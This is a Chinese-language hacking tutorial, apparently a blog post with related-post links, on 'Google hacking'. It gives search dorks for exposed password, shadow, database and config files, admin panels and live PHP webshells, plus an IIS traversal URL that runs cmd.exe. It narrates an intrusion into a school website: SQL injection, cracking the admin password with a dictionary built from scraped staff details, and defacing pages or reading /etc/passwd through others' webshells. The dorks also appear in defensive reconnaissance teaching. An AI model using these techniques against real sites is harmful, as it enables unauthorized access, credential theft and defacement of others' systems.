GooGle Hack——让你瞬间成为黑客

google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途。google hacking其实并非如此简单...

  常用的google关键字:

  foo1 foo2 (也就是关联,比如搜索xx公司 xx美女)

  operator:foo

  filetype:123 类型

  site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息

  intext:foo

  intitle: fooltitle 标题哦

  allinurl:foo 搜索xx网站的所有相关连接。(踩点必备)

  links:foo 不要说就知道是它的相关链接

  allintilte:foo.com

  我们可以辅助"-" "+"来调整搜索的精确程度

  直接搜索密码:(引号表示为精确搜索)

  当然我们可以再延伸到上面的结果里进行二次搜索

  "index of" htpasswd / passwd

  filetype:xls username password email

  "ws_ftp.log"

  "config.php"

  allinurl:admin mdb

  service filetype:pwd ....或者某个比如pcanywhere的密码后缀cif等

  越来越有意思了,再来点更敏感信息

  "robots.txt" "Disallow:" filetype:txt

  inurl:_vti_cnf (FrontPage的关键索引啦,扫描器的CGI库一般都有地)

  allinurl: /msadc/Samples/selector/showcode.asp

  /../../../passwd

  /examples/jsp/snp/snoop.jsp

  phpsysinfo

  intitle:index of /admin

  intitle:"documetation"

  inurl: 5800(vnc的端口)或者desktop port等多个关键字检索

  webmin port 10000

  inurl:/admin/login.asp

  intext:Powered by GBook365

  intitle:"php shell*" "Enable stderr" filetype:php 直接搜索到phpwebshell

  foo.org filetype:inc

  ipsec filetype:conf

  intilte:"error occurred" ODBC request where (select|insert) 说白了就是说,可以直接试着查查数据库检索,针对目前流行的sql注射,会发达哦

  "Dumping data for table" username password

  intitle:"Error using Hypernews"

  "Server Software"

  intitle:"HTTP_USER_AGENT=Googlebot"

  "HTTP_USER_ANGET=Googlebot" THS ADMIN

  filetype:.doc site:.mil classified 直接搜索军方相关word

  检查多个关键字:

  intitle:config confixx login password

  "mydomain.com" nessus report

  "report generated by"

  "ipconfig"

  "winipconfig"

  google缓存利用(hoho,最有影响力的东西)推荐大家搜索时候多"选搜索所有网站"

  特别推荐:administrator users 等相关的东西,比如名字,生日等……最惨也可以拿来做字典嘛

  ……

2

  一些技巧集合:

  1) index.of.password

  1) filetype:blt "buddylist"

  2) "access denied for user" "using password"

  2) intitle:"index of" inurl:ftp (pub | incoming)

  3) "http://*:*@www" domainname

  3) filetype:cnf inurl:_vti_pvt access.cnf

  4) auth_user_file.txt

  4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"

  5) The Master List

  5) inurl:"install/install.php"

  6) allinurl: admin mdb

  6) intitle:"welcome.to.squeezebox"

  7) passlist.txt (a better way)

  7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"

  8) "A syntax error has occurred" filetype:ihtml

  8) intitle:Login intext:"RT is ? Copyright"

  9) "# -FrontPage-" inurl:service.pwd

  9) ext:php program_listing intitle:MythWeb.Program.Listing

  10) ORA-00921: unexpected end of SQL command

  10) intitle:index.of abyss.conf

  NO2:

  --------------------------------------------------------------------------------

  google hacking的简单实现

  使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.

  intext:

  这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似.

  intitle:

  和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网

  页.同理allintitle:也同intitle类似.

  cache:

  搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.

  define:

  搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.

  filetype:

  这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入

  :filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)

  info:

  查找指定站点的一些基本信息.

  inurl:

  搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接http://www.xxx.com/xxx/admin,用来找管理员登

  陆的URL不错.allinurl也同inurl类似,可指定多个字符.

  link:

  例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL.

  site:

  这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL.

  对了还有一些*作符也是很有用的:

  + 把google可能忽略的字列如查询范围

  - 把某个字忽略

  ~ 同意词

  . 单一的通配符

  * 通配符,可代表多个字母

  "" 精确查询

3

  下面开始说说实际应用

  以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了.而google正因为其强大的搜索能力往往会

  把一些敏感信息透露给他们.用google搜索以下内容:

  intitle:"index of" etc

  intitle:"Index of" .sh_history

  intitle:"Index of" .bash_history

  intitle:"index of" passwd

  intitle:"index of" people.lst

  intitle:"index of" pwd.db

  intitle:"index of" etc/shadow

  intitle:"index of" spwd

  intitle:"index of" master.passwd

  intitle:"index of" htpasswd

  "# -FrontPage-" inurl:service.pwd

  有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的

  同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,可以用google来找网上使用这套程序的站点:

  intext:ZeroBoard filetype:php

  或者使用:

  inurl:outlogin.php?_zb_path= site:.jp

  来寻找我们所需要的页面.phpmyadmin是一套功能强大的数据库*作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行*作.我们可以用google搜索存在这样漏洞的程序URL:

  intitle:phpmyadmin intext:Create new database

  还http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。同样我们可以用这个找找有其他cgi漏洞的页面。

  allinurl:winnt system32

  前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:

  allinurl:bbs data

  filetype:mdb inurl:database

  filetype:inc conn

  inurl:data filetype:mdb

  intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况,和上面的原理一样,我们还可以用google来找后台.

  利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试

  首先用google先看这个站点的一些基本情况(一些细节部分就略去了):

  site:xxxx.com

  从返回的信息中,找到几个该校的几个系院的域名:

  http://a1.xxxx.com

  http://a2.xxxx.com

  http://a3.xxxx.com

  http://a4.xxxx.com

  顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没

  site:xxxx.com filetype:doc

  得到N个不错的doc。

  先找找网站的管理后台地址:

  site:xxxx.com intext:管理

  site:xxxx.com inurl:login

  site:xxxx.com intitle:管理

  超过获得2个管理后台地址:

  http://a2.xxxx.com/sys/admin_login.asp

  http://a3.xxxx.com:88/_admin/login_in.asp

4

  还算不错,看看服务器上跑的是什么程序:

  site:a2.xxxx.com filetype:asp

  site:a2.xxxx.com filetype:php

  site:a2.xxxx.com filetype:aspx

  site:a3.xxxx.com filetype:asp

  site:.......

  ......

  a2服务器用的应该是IIS,上面用的是asp的整站程序,还有一个php的论坛

  a3服务器也是IIS,aspx+asp。web程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:

  site:a2.xxxx.com intext:ftp://*:*

  没找到什么有价值的东西。再看看有没有上传一类的漏洞:

  site:a2.xxxx.com inurl:file

  site:a3.xxxx.com inurl:load

  在a2上发现一个上传文件的页面:

  http://a2.xxxx.com/sys/uploadfile.asp

  用IE看了一下,没权限访问。试试注射,

  site:a2.xxxx.com filetype:asp

  得到N个asp页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,dbowner权限,虽然不高但已足矣,back a shell不太喜

  欢,而且看起来数据库的个头就不小,直接把web管理员的密码暴出来再说,MD5加密过。一般学校的站点的密码都比较有规律,通常都是域名+

  电话一类的变形,用google搞定吧。

  site:xxxx.com //得到N个二级域名

  site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的

  site:xxxx.com intext:电话 //N个电话

  把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1个管理员,还有一个可能是老师的帐号。登陆上去:

  name:网站管理员

  pass:a2xxxx7619 //说了吧,就是域名+4个数字

  要再怎么提权那就不属于本文讨论访问了,呵呵,到此为止。

  这段时间在国外的一些google hack的研究站点看了看,其实也都差不多是一些基本语法的灵活运用,或者配合某个脚本漏洞,主要还是靠

  个人的灵活思维。国外对于google hack方面的防范也并不是很多,所以大家还是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑

  apache的网管们应该多注意一下这方面,一个intitle:index of就差不多都出来了:)

  1.查找利用php webshell

  intitle:"php shell*" "Enable stderr" filetype:php

  (注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中,你能找到很多直接在机器上执

  行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明

  的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填

  写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:

  echo "召唤" > index.jsp

  现在看看首页,已经被我们改成: "召唤" 了。

  我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file

  echo "test" >> file

  这样一条条打出来,站点首页就成功被替换了。同样的也可以

  uname -a;cat /etc/passwd

  不过有点要注意,有些WEBSHELL程序有问题,执行不了的,

  2.搜索INC敏感信息

  在google的搜索框中填入:

  Code:

  .org filetype:inc

时间: 2024-10-08 15:52:49

GooGle Hack——让你瞬间成为黑客的相关文章

Google Hack的一些整理

这里是一些关于Google Hack方面的整理 黑客专用信息和资料搜索地址为: http://www.google.com/custom?hl=xx-hacker 这里是google关键字的用法,要设置它为中文,则是 http://www.google.com/custom?hl=zh-CN 英文则是http://www.google.com/custom?hl=en 常用的google关键字: foo1 foo2 (也就是关联,比如搜索xx公司 xx美女) operator:foo filet

google hack 之 查询语法

google hack 之 查询语法 文/玄魂   前言 谷歌网页搜索技术,大部分在百度等搜索引擎中也适用.同样,这些搜索技术是来源于传统数据库检索技术,因而,对这部分的学习,能为后续章节的数据库检索奠定基础,并能获得直观的认识.本部分结合应用实例的讲解也能让我们加深信息检索对解决实际问题.提高搜索效率的认知. 欢迎访问玄魂的博客 1.1  默认模糊搜索.自动拆分短语 同许多搜索引擎一样,当直接在搜索框中输入搜索词时,谷歌默认进行模糊搜索,并能对长短语或语句进行自动拆分成小的词进行搜索. 示例:

1004.Google Hack技术

Google Hack技术 目前黑客利用Google Hack技术来进行入侵或资料收集的时候主要有以下几点: ①.在入侵之前,可以利用Google Hack技术进行信息收集,典型的有比如查找网站后台及网站的拓扑结构等等. ②.当发现或者公布某个漏洞之后,利用Google Hack技术大量收集存在这个漏洞的主机或网站,典型的有许愿版暴库漏洞,利用Google Hack技术找到许愿版之后就暴库,最后得到Webshell. ③.边入侵边搜索,因为我们的入侵过程是一个动态的,我们必须根据不同的情况来区分

Google高级技巧—google Hack★★★★

google hacking事实上并算不上什么新东西,当时并没有重视这样的技术,觉得webshell什么的,并无太大实际用途.google hacking事实上并非如此简单... 经常使用的googlekeyword: foo1 foo2 (也就是关联,比方搜索xx公司 xx美女) operator:foo filetype:123 类型 site:foo.com 相对直接看网站更有意思,能够得到很多意外的信息 intext:foo intitle: fooltitle 标题哦 allinurl

Kali Linux Web 渗透测试视频教程— 第四课 google hack 实战

Kali Linux Web 渗透测试— 第四课 google hack 实战 文/玄魂 目录 shellKali Linux Web 渗透测试—... 1 第四课 google hack 实战... 1 课程目录... 2 Googlehack基础知识... 3 寻找持续构建工具Jenkins的管理面板... 3 搞定xampp. 4 后门查找... 6 关于google hack database . 6 教程地址:第四课 google hack 实战 课程目录      1.寻找持续构建工

Kali Linux Web 渗透测试视频教程— 第二课 google hack 实战

Kali Linux Web 渗透测试— 第二课 代理简介 文/玄魂 课程地址: http://edu.51cto.com/course/course_id-1887.html 目录 shellKali Linux Web 渗透测试—... 1 第二课代理简介... 1 课程目录... 2 Proxy基本原理... 2 正向代理(Forward Proxy)3 反向代理(reverse proxy)... 3 透明代理(transparente proxy)... 3 Kali linux中的代

关于Google hack

google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.google hacking其实并非如此简单... 常用的google关键字: foo1 foo2 (也就是关联,比如搜索xx公司 xx美女) operator:foo filetype:123 类型 site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息 intext:foo intitle: fooltitle 标题哦 allinurl:foo 搜索xx

Google Hack搜索技巧

想了解更多搜索技巧,点击下面网站了解http://exploit-db.com/google-dorks Google Hack的一些整理 这里是google关键字的用法,要设置它为中文,则是 http://www.google.com/custom?hl=zh-CN 英文则是http://www.google.com/custom?hl=en 常用的google关键字: foo1 foo2 (也就是关联,比如搜索xx公司 xx美女) operator:foo filetype:123 类型 s

最值得一看的几条简单的谷歌 Google 搜索技巧,瞬间提升你的网络搜索能力!

可能你和我一样,几乎每天都必须与搜索引擎打交道,不过很多时候,你辛辛苦苦搜了半天也没找到合适的资料,然而“高手们”上来一眨眼功夫就能命中目标了.这并不是别人运气好,而是搜索引擎其实是有很多技巧可以帮助你更好地找到想要内容的. 不过,据说超过3/4的人都没有较好地利用起网络搜索.所以今天在这跟大家分享一张非常有价值的信息图,它以 Google 谷歌搜索引擎为例子,介绍了几个相当实用的搜索技巧,非常简单,但绝对能瞬间提高你的搜索功力!有效地利用谷歌来为你工作不但能提高你的效率,日常生活也会方便许多,